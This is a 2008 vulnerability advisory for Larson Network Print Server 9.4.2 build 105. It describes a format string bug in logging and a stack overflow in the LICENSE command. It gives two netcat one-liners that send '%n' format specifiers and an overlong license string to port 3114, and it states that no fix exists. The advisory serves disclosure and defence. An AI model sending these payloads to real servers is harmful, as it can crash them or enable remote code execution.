Format string and buffer-overflow in Lst Network Print Server 9.4.2 build 105

Type securityvulns
Reporter Securityvulns
Modified 2008-02-12T00:00:00


                         Luigi Auriemma

Application: Larson Software Technology Network Print Server Versions: <= 9.4.2 build 105 Platforms: Windows Bugs: A] format string in logging B] license buffer-overflow Exploitation: remote Date: 11 Feb 2008 Author: Luigi Auriemma e-mail: web:

1) Introduction 2) Bugs 3) The Code 4) Fix

=============== 1) Introduction ===============

LstNPS is a CGM print server for Windows.

======= 2) Bugs =======

A] format string in logging

The server is affected by a format string vulnerability located in the logging functions (by default enabled and set on "Information") which passes the log message directly to vsnprintf without the format argument.

B] license buffer-overflow

The LICENSE command handled by the server leads to a buffer-overflow vulnerability when a license string longer than 128 bytes is copied in a stack buffer using strncpy in the wrong way.

=========== 3) The Code ===========

A] echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v

B] echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v

====== 4) Fix ======

No Fix

Luigi Auriemma